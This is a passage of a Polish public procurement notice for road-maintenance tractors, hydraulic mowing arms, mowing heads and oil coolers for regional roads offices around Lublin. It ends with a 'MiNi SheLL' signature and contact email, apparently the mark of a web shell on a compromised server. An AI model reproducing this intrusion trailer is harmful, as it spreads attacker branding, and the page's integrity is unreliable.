- skrzynia biegów zsynchronizowana, min.20 P + 20 T, biegi pełzające od 0,5 km/h - 0.9 km/h, 
- blokada tylnego mechanizmu różnicowego,
- Układ hamulcowy :
- hamulce zintegrowane na 4 koła, tarczowe,
- hamulec postojowy niezależny,
- hamulec przyczepy pneumatyczny,
- układ kierowniczy hydrostatyczny z regulowaną kolumną kierowniczą 
 - W.O.M.  tył
-  niezależny napęd sterowany elektro - hydraulicznie poprzez przyciski o prędkości
    min 540 -540 ECO obr./min,
- Podnośnik: tył - hydrauliczny sterowany mechanicznie o udźwigu minimum 3000 kg. 
- Kabina z wentylacją, ogrzewaniem , szyberdach  , fotel operatora na zawieszeniu pneumatycznym, 
napisy boczne: na pierwszym ciągniku: ZDW Lublin Rejon Dróg Wojewódzkich w Puławach,  na drugim ciągniku: ZDW Lublin Rejon Dróg Wojewódzkich w Chełmie 
- Lampa błyskowa ostrzegawcza koloru pomarańczowego z żarówką  LBX
- Regulowany zaczep transportowy do przyczepy ze sworzniem,
- Zaczep typu Cramer wielootworowy z układem stabilizacji poziomej /wersja drogowa/,
- Ramiona główne podnośnika z blokadą poziomowania /wersja drogowa wzmocniona/
- Ogumienie  -standard 
- Ciągnik musi być przystosowany do współpracy z osprzętem wymienionym w pkt. 2)-4).
- Udokumentowanie danych fabrycznych (folder producenta)
- Ciągnik musi posiadać dokumenty niezbędne do zarejestrowania bez dodatkowych czynności,      oraz instrukcję w języku polskim (wyciąg ze świadectwa homologacji).
 - Wykonawca zabezpieczy serwis gwarancyjny w miejscu przebywania ciągnika w  ciągu 48 godz. od chwili  zgłoszenia awarii.
 

2) Wymagane parametry techniczne ramienia hydraulicznego szt. 2 montowanego z tyłu ciągnika.

- Rok produkcji 2012 (fabrycznie nowe)
- Zakres roboczy w poziomie minimum 6,00m,
- Obrót ramienia w poziomie minimum 110 o,
- Możliwość instalowania objętych i nie objętych specyfikacją głowic roboczych.
- Chłodnica oleju z elektronicznym termostatem,
- System ,,pływającej,, regulacji głowicy koszącej do terenu
- Niezależny od ciągnika układ hydrauliczny,
- Bezpiecznik hydrauliczno - pneumatyczny najazdowy,
- Bezpiecznik hydrauliczno - pneumatyczny ramienia,
- Dwa kierunki obrotu wału tnącego sterowane z kabiny,
- Ciśnienie robocze min. 200Bar
- Moc na hydromotorze minimum 52KM
- Sterowanie funkcjami ramienia z kabiny operatora mechanicznie,
 - Wysokość transportowa i garażowa wraz z ciągnikiem max. 2,80 m,
 - udokumentowanie danych fabrycznych ( oryginalny folder producenta ),
- Wykonawca zabezpieczy serwis gwarancyjny w miejscu przebywania urządzenia w  ciągu 48 godz. od chwili  zgłoszenia awarii.

3) Wymagane parametry techniczne głowicy do koszenia traw i krzaków  szt. 2
- Rok produkcji 2012 (fabrycznie nowa)
- Głowica tnąca o szerokości   min 125 cm,
-  Moc na wale tnącym minimum 35 KM,
-  Noże tnące i rozdrabiające typu Y  min. 36 szt.
- Średnica cięcia i rozdrabniania minimum 5 cm,
- Regulacja wysokości cięcia min. 2 - 10 cm,
- Rolka podporowa  bezobsługowa (bez punktów smarowania)
 - Regulowana przednia część głowicy w trzech położeniach ,
 - Udokumentowanie danych fabrycznych (folder producenta),
 - Wykonawca zabezpieczy serwis gwarancyjny w miejscu przebywania urządzenia w  ciągu 48 godz. od chwili  zgłoszenia awarii.

 4) Wymagane parametry techniczne chłodnic oleju hydraulicznego  -  szt. 6   

- Rok produkcji 2012 (fabrycznie nowe)
- przepływ min 95l/min
- ciśnienie pracy min  25 Bar 
- czujnik temperatury 
- napięcie zasilania 9-15VDC
- regulacja prędkości  obrotów wentylatora zależnie od temperatury oleju w konfiguracji  z  czujnikiem temperatury.   
- załączanie automatyczne wentylatora zależnie od temperatury oleju w konfiguracji z wyłącznikiem temperatury   
- moc chłodnicza  min 3,2kW w warunkach 50oC olej hydrauliczny , 26oC powietrze,
- współczynnik odbioru ciepła min 0,11 kW/oC
- łagodny rozruch silnika wentylatora
 - zabezpieczenie silnika przed odwrotną polaryzacją napięcia , przeciążeniem i przegrzaniem
-  gwarancja jakości min. 12 miesięcy
  
  Montaż do następujących ramion hydraulicznych zlokalizowanych w:   
-	ramię hydrauliczne FERRI  TP 60 Rejon Dróg Wojewódzkich w Parczewie 
-	ramię hydrauliczne FERRI  TP 60 Rejon Dróg Wojewódzkich w Lublinie z/s w Bychawie 
-	ramię hydrauliczne FERRI  TP 61 Rejon Dróg Wojewódzkich w Zamościu
-	ramię hydrauliczne FERRI  TP 61 Rejon Dróg Wojewódzkich w Białej Podlaskiej 
-	ramię hydrauliczne ROLMEX  KR 600 Rejon Dróg Wojewódzkich w Hrubieszowie  
-	ramię hydrauliczne ROLMEX KR 600 Rejon Dróg Wojewódzkich we Włodawie
Wykonawca dostarczy i zamontuje chłodnice oleju hydraulicznego w miejscach wskazanych powyżej lub w autoryzowanym serwisie. Transport zabezpieczy Wykonawca. W cenie oferty należy uwzględnić koszty transportu do miejsca montażu i z miejsca montażu.  

5)	Szkolenie :
W  ramach Zadania Nr 3  Wykonawca przeprowadzi szkolenie z zakresu obsługi  i eksploatacji ciągników wraz z osprzętem dla osób WYTYPOWANYCH przez  Zamawiającego, a po zakończeniu szkolenia wykonawca wystawi uczestnikom stosowne imienne zaświadczenia o odbyciu przeszkolenia. Miejsce i  termin szkolenia Wykonawca uzgodni z Zamawiającym.

Ciągniki wraz z osprzętem należy dostarczyć do siedziby Rejonu Dróg Wojewódzkich w Puławach, 
ul. Składowa 1a, 24-100 PUŁAWY oraz Rejonu Dróg Wojewódzkich w Chełmie ul. Lwowska 24, 22-100 CHEŁM
.
Wykonawca udzieli gwarancji  jakości na ciągniki wraz z osprzętem na  min. 12 miesięcy.

Wartość Zadania Nr 3 - 398 373,98 zł. netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 16.31.00.00-1, 42.90.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com